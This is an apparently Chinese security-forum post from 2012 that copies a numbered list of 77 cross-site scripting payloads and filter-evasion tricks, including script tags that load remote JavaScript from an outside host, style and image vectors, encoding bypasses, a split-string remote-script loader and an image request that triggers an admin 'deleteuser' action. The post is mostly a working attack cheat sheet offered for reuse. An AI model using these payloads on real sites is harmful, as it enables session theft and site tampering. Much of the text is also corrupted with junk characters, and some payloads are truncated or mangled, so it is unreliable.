貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 [( k4 ~' j1 n" ?! Y) }
8 E P6 j4 G' e5 b3 |" o (1)普通的XSS JavaScript注入" _1 W% k3 r: G0 ?4 i U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" e& D0 A# b+ m/ x8 _
" q# \2 S8 k# }/ M9 { (2)IMG标签XSS使用JavaScript命令# m( E( x, F$ \; y5 L1 |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># N O+ L' ?7 W6 d8 l; K, ~* n
/ ~/ A: W! G' M t* A5 | (3)IMG标签无分号无引号
6 J* o1 q1 w1 c% i1 z <IMG SRC=javascript:alert(‘XSS’)>8 }. V0 r6 J2 }" Q6 h
. D( h( M( I. t2 Z0 v
(4)IMG标签大小写不敏感7 ]8 t( _4 s8 r6 \- r
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>% j+ c9 ^- M% D9 J
; ^' h3 z! S! O" ^2 ? (5)HTML编码(必须有分号)
6 f X/ h& r5 F <IMG SRC=javascript:alert(“XSS”)>
0 D+ x) J ?- i. I$ Q- _2 K
( s) o( b" H" {( f8 {+ J# E (6)修正缺陷IMG标签
& e: u: {+ `* W/ i <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* L3 y" ^- U, C; t" @8 v J5 p5 q3 V
(7)formCharCode标签(计算器)
/ b7 b" |3 g; }+ d' ]# R. B. U <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>( E8 n" h7 r4 }7 v% K1 ]' f# S t
6 N( r% l! A" [9 Y$ C; F& T, }; k (8)UTF-8的Unicode编码(计算器)
8 L7 }5 d$ y% q0 N: S <IMG SRC=jav..省略..S')>
0 A) K: [7 A- t: w
+ g8 p9 v0 F" o7 P$ Z0 O (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- A: a, G# ^' ~5 S7 T& t" r, C0 R n <IMG SRC=jav..省略..S')>
# g* a9 y* E, H. r- x9 P' G) {
0 Y. t7 p3 I7 z (10)十六进制编码也是没有分号(计算器)
6 I7 Y2 Q o/ H( ~ <IMG SRC=java..省略..XSS')>
) z6 v( x0 m# V, o
( R* d f* i% W" D; k \ (11)嵌入式标签,将Javascript分开' ^- n' K; e1 J% K
<IMG SRC=”jav ascript:alert(‘XSS’);”>- ]8 {9 f0 n4 v3 [ Y* l0 V: _$ ^8 V
; M! Y2 U# K/ t Z4 A
(12)嵌入式编码标签,将Javascript分开8 D w- z9 e% p( {5 w: }0 @6 G# ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 @0 ~! g8 S/ M @
/ S' `" @6 L1 t; v+ y# U3 g$ z (13)嵌入式换行符+ k& K7 \* f# c. m7 W* C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* W3 y! @4 Y. T6 ~6 c) R' j- m. E# x2 V4 F. _( h
(14)嵌入式回车
" ~9 h; w/ \* r& f- b: G7 o <IMG SRC=”jav ascript:alert(‘XSS’);”>
7 A& z P+ G. `/ J/ `# [1 U
$ H& n3 Y" j! z( Q0 u* y (15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 G- a7 v# I* E8 ?- I' I$ s <IMG SRC=”javascript:alert(‘XSS‘)”>
2 _4 i) k% _- u1 Y/ n# g0 N' a" |% T" z% u q; M
(16)解决限制字符(要求同页面). C* ~: r1 y* V/ z% C) W v Q& F
<script>z=’document.’</script>
( c. S* Y- n2 _; m2 K0 w0 X <script>z=z+’write(“‘</script>
1 j$ P5 H- ?' ?% C <script>z=z+’<script’</script>! `0 g7 w5 Z7 {1 S( Q
<script>z=z+’ src=ht’</script>
* U, Y; [+ w2 J! J- B <script>z=z+’tp://ww’</script>$ i- Q* o# z: K( T9 U* M
<script>z=z+’w.shell’</script>! X2 ]! Y& S2 p9 ?- f# \
<script>z=z+’.net/1.’</script>
2 m5 G+ g/ j' z, ~ C/ }8 k <script>z=z+’js></sc’</script>, `7 A+ d: a0 z9 @
<script>z=z+’ript>”)’</script>
9 O. V' Q6 \5 h <script>eval_r(z)</script>, R( }9 \7 X' f. Z6 R* U
@) _2 {" C& j2 R
(17)空字符/ G. Z4 d& i; [! g6 E
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ O8 [* H8 T6 n: A" }, x/ H% q4 b7 ~. W- K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& C* H$ n( y3 E6 o( e0 U perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* T' N5 H5 _: C& ^ e
. p; _, G$ h4 c: K (19)Spaces和meta前的IMG标签; V9 a- ]2 S) [+ C
<IMG SRC=” � javascript:alert(‘XSS’);”>( P W& d6 L3 \/ E0 y7 n
2 X Z9 {! L* y/ F% L
(20)Non-alpha-non-digit XSS& A* r6 @4 d* P; c1 w
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& {/ ^9 k/ O* ?' q
% u5 M- G! P ^. k% w (21)Non-alpha-non-digit XSS to 2- W- R1 E9 {/ H# I( L5 Y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>" g7 L' v; p5 r: I
. }" S7 }. X( |1 p+ A
(22)Non-alpha-non-digit XSS to 3
& [$ k" Y' m# l$ f( f4 B& e6 } <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( H1 W( N$ V/ g
2 e. J; E* I+ q) h7 q# W (23)双开括号1 O. X2 V J+ [7 k% k E
<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 a4 R% F/ B& n3 J
. _- ]0 I6 N) `
(24)无结束脚本标记(仅火狐等浏览器)
' c m# C! i; } o# C <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; ?6 a! f9 a- N6 ~; M4 _
$ [, r* c3 [2 ^0 T* z+ X (25)无结束脚本标记2 M: @: n6 U- u1 {1 Y& C9 s# W7 |0 U U
<SCRIPT SRC=//3w.org/XSS/xss.js>% d; z+ C- v% J: t
& Y$ m" x4 H0 e6 w4 l. z) x; p (26)半开的HTML/JavaScript XSS
9 W. u& k; q- B <IMG SRC=”javascript:alert(‘XSS’)”5 W0 l- z- D* K
% E- [$ g% F! h: w- e$ C( t. N+ o/ z
(27)双开角括号' X% n: C# r0 y, _5 j
<iframe src=http://3w.org/XSS.html <
: |8 x9 q( X3 M! j1 o! O0 U6 ^' }, Q4 l" a
(28)无单引号 双引号 分号
1 e8 N: D: X8 k <SCRIPT>a=/XSS/3 j& x9 q/ I( V3 z) G1 `/ Z' b# W1 D) L
alert(a.source)</SCRIPT>* ]% A( A: a. D9 z* E- W
7 Z+ ]! ]" Y1 ? (29)换码过滤的JavaScript
( B4 k3 R5 k7 ~: I( T \”;alert(‘XSS’);//
4 _: ?1 X/ W5 [& C$ l+ v) l- F, L `; U+ u
(30)结束Title标签
2 F) S# Z8 M3 r3 F; N) M7 i+ @' l </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 B0 }: ~* |# L5 U" a- H0 x
5 ?. K* g# t9 D) j* b) \' u (31)Input Image! I* g, Q* ~+ P( L a1 E3 r
<INPUT SRC=”javascript:alert(‘XSS’);”>
: v; B$ c2 A7 P, ^7 m, a; O3 f! M4 n. p" {0 G1 n% R3 N) q
(32)BODY Image1 O2 v4 W6 ^. N' b E/ l; f0 K* z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 f f' k, z6 n, `$ d A
6 N G8 o% s3 o+ O1 j) Z$ m
(33)BODY标签
3 W# J2 M8 A) s7 S$ r, L! l$ i <BODY(‘XSS’)>
! \" F8 w Q5 G) ~2 Y% X
3 v2 X1 G; ?% b" ~; O (34)IMG Dynsrc
% ]2 x' ^7 P. k5 S$ I$ D9 I <IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 B1 u" P |* ^2 K
2 Z" \ J1 c2 t: U* [/ d0 } (35)IMG Lowsrc) X! V/ `; w, B$ Q b7 I8 p# c
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! t8 O/ l c( [
& L6 Y1 [& ]6 [1 W (36)BGSOUND) F% T! v$ ?4 s; }3 Z) A2 N
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- O7 W$ D/ s' G& }3 {. Q* u1 ~! |4 h& m- M1 ^
(37)STYLE sheet$ a0 } K" G! s5 `7 p' C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 q; C2 v! u3 L3 Y2 U5 Z9 L; P; |& x- s$ ^) _" U! ^: G. ~' G
(38)远程样式表5 b) E I" ? w, v q Y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ C( v# b4 [( k! d, R* U
# D; h( k# ` k* j# e (39)List-style-image(列表式)
' k9 o. b0 W; }/ R2 k* U. O2 r <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS/ @. K4 G, R2 g M% H$ K/ _$ }8 [ e* i
' F4 L% f. h" I/ f3 I( P1 {. O, V (40)IMG VBscript
/ H: l4 u, V/ r1 q <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS+ S% r# \( X* h( u# G2 |% ?
5 f7 ~( { Q$ L, Q# \& j7 M! ? (41)META链接url
}. i0 u' Z0 V9 F! _4 {1 O$ a8 p# G <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>3 u9 p0 q9 ]$ e1 Z3 u
! Z$ M% {9 i# [- m4 z$ |1 v (42)Iframe' n7 h/ _5 Y' b( O
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( |. R0 b3 [: ^( T
) n2 z8 D' m* s: `, `: E9 [ (43)Frame3 U r1 z) {' _! j
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) z8 V7 n' ]; w+ ]$ S3 x
7 E M' s: _6 ~5 W# ?& Q" a) ] (44)Table
$ l: d% z* \! s& c3 B8 W) R <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) x# }- E5 d- }4 }3 L' E$ Z2 R
0 }/ F8 i. E* Q/ e (45)TD
2 ?- V7 S# z+ g0 Z <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
G) y: U* n4 d/ W$ V& h& y! J: q3 I7 `" Z8 O \
(46)DIV background-image( ^1 i% B3 k7 \9 `& y$ w" k8 b8 t
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
N& }" x' ~& |, ` n, t4 i" a% S z M& }1 \+ @) F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 J( W; w8 ^$ O; a- e7 f* F/ v
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>$ C; |8 t: D( C: l4 S. O: e" i) L
# v/ W9 H" f; W9 I, f/ M4 n$ O
(48)DIV expression
) ]& |3 I1 s [ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>) @- ]& d5 y4 ` x3 G! |" ]. N' F
1 H+ ~1 H" ~- m% v3 {& e4 @& O! Y
(49)STYLE属性分拆表达( j; j o, `$ B6 s
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 E) }7 C7 N9 z0 N
0 w& e, p$ k1 X9 N1 x. a5 A (50)匿名STYLE(组成:开角号和一个字母开头) x) t3 J! T. l# Z# \6 O) l
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' F0 N X- k: @% F. O1 W$ O* f3 r: r% x1 k: T- J
(51)STYLE background-image1 a, J2 Y# {1 F t- {6 L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ `% A' D7 ^4 G, q6 {4 V9 Q
. i- c. w6 ?1 U; {" ~# x/ F (52)IMG STYLE方式
) P& H2 |* i0 ^, o exppression(alert(“XSS”))’>6 \% r" l$ v) `! u9 X
, J. N8 d; D! A- @6 C4 J& P/ }0 _
(53)STYLE background
3 M, @- V+ Q/ o <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 ~% f4 c% j# O B
3 J* X1 Z" T5 H (54)BASE
i, ~# V5 p1 Y9 B" f1 s$ w <BASE HREF=”javascript:alert(‘XSS’);//”>- e5 W$ L/ R. N# x! m; M
% k7 g, a- E7 | (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 |9 a1 J% V6 v <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>- ?8 N! `4 G& C$ K
$ C2 o a7 N3 i$ y( |# G1 V
(56)在flash中使用ActionScrpt可以混进你XSS的代码! Z( ]" G* w- ?, [9 @( s& {/ M
a=”get”;7 V& D8 r8 n9 H# A9 }
b=”URL(\”";( l! _0 y5 [) J4 \" W6 X
c=”javascript:”;% v) t- y3 ]2 X4 s( l$ N
d=”alert(‘XSS’);\”)”;) A1 R" o/ K6 V
eval_r(a+b+c+d);
- Y% M7 c! i4 ^1 O, |1 X/ m
& E/ O* S3 s$ T& { (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上0 o, p9 K( s; Q
<HTML xmlns:xss>7 d! W6 Y" _# _
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>: r/ F5 T1 Y j* ~
<xss:xss>XSS</xss:xss>% c; V, u& X# l% M4 ~1 a
</HTML>
# _/ l% g' U' X6 j
$ o! a1 d7 r4 h% V6 y (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, }; L$ S7 h2 B" O/ b <SCRIPT SRC=””></SCRIPT>" ]' I4 _' L2 I5 J
# C: A5 Q, X, g, L (59)IMG嵌入式命令,可执行任意命令! X( J; E6 X# w" K+ W, r
<IMG SRC=”http://www.XXX.com/a.php?a=b”>& Y" W! y5 f% k4 Y: b! v }
. {) [7 x9 W7 Q( B5 U. r; \
(60)IMG嵌入式命令(a.jpg在同服务器)4 K: c. m$ P6 m7 Z3 y9 U
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 b+ \: p& h: c( Y8 e& ^) U: z9 D
(61)绕符号过滤2 d% c; ]1 R3 U1 I7 {4 Z- O
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( ~. [2 Q5 g9 L' Q
! O+ ?( j! ]0 J, j. d$ E5 e4 S; G
(62)
& C; C3 ]* u) h <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( P) o# G4 R; J" \6 ]; w6 }4 O- J1 L# |0 J- C( S
(63)( h* b0 u7 K7 Q0 C6 g
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! w" B4 V, K I V$ O
( h ^6 s5 B3 o/ `& z) ~ (64)
2 v1 F" V, k0 P; c+ E <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>$ x, j( q! r! W: X2 p( a4 y v
0 J7 E( j9 y1 B) V (65)
# a; g$ ^7 [# W <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
# H% \+ _+ Y5 t1 m( W
0 a) o" L) K; g G$ f) _, L (66)
0 f8 P# x1 Q7 M" ~; v <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>+ N& V$ I! a4 ]9 w5 M% y
5 v d6 U3 ?. x (67)( }0 Z8 Y. j7 F5 b6 S2 m# J
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
* \6 D0 n1 M0 B+ u& }+ g# E# _3 M2 H/ {: u; M7 s1 n; f. q7 X" l u4 g
(68)URL绕行
2 x, d: N3 O( H `+ o3 x6 t <A HREF=”http://127.0.0.1/”>XSS</A>! C( F0 C5 T0 P9 A0 j# Q
' O1 E) K0 z# n0 g3 q (69)URL编码% l" Q8 Q4 u* N: |, I
<A HREF=”http://3w.org”>XSS</A>
6 s7 I h# a+ e
% |& Y5 y( m% B (70)IP十进制
8 \" X- ]) d! w+ u <A HREF=”http://3232235521″>XSS</A>. u! H+ s1 V2 s
, d" M0 S, z) D (71)IP十六进制
. S, U) P9 M7 |5 ~: m% }& x1 B <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> }% Q+ Y& @6 T$ Y( z
4 [: u. }$ w$ `
(72)IP八进制
2 {6 x* q( O* x! j <A HREF=”http://0300.0250.0000.0001″>XSS</A>' n1 Q2 @6 i1 ]1 e& D- z
' h9 |( T3 b) ] e: L) \ (73)混合编码( a* } G( Q* F6 D* N( D
<A HREF=”h" u' h9 a3 ^2 m, q
tt p://6 6.000146.0×7.147/”">XSS</A>
$ a. u; ^+ T' k% C) u/ c9 {5 G. y0 L
(74)节省[http:]
. C! H4 j- W8 n& E! h- H <A HREF=”//www.google.com/”>XSS</A>
5 b0 r& ]9 ]8 D. F7 z: y* {4 G8 ^7 C1 s& c+ N
(75)节省[www]( K$ [" |9 |. Z: d1 j3 l
<A HREF=”http://google.com/”>XSS</A>* n6 h p$ C# e& d8 u. }% E$ P; f
! B* v) i5 @7 N, H" U: E
(76)绝对点绝对DNS
u) }1 M( r: K& K <A HREF=”http://www.google.com./”>XSS</A>1 G* F4 ]3 q7 c; U. v8 i& I
' h. h4 n; e. `, B; m: k3 H (77)javascript链接
& Z5 f2 l' o1 B4 F" U m$ k- Q <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对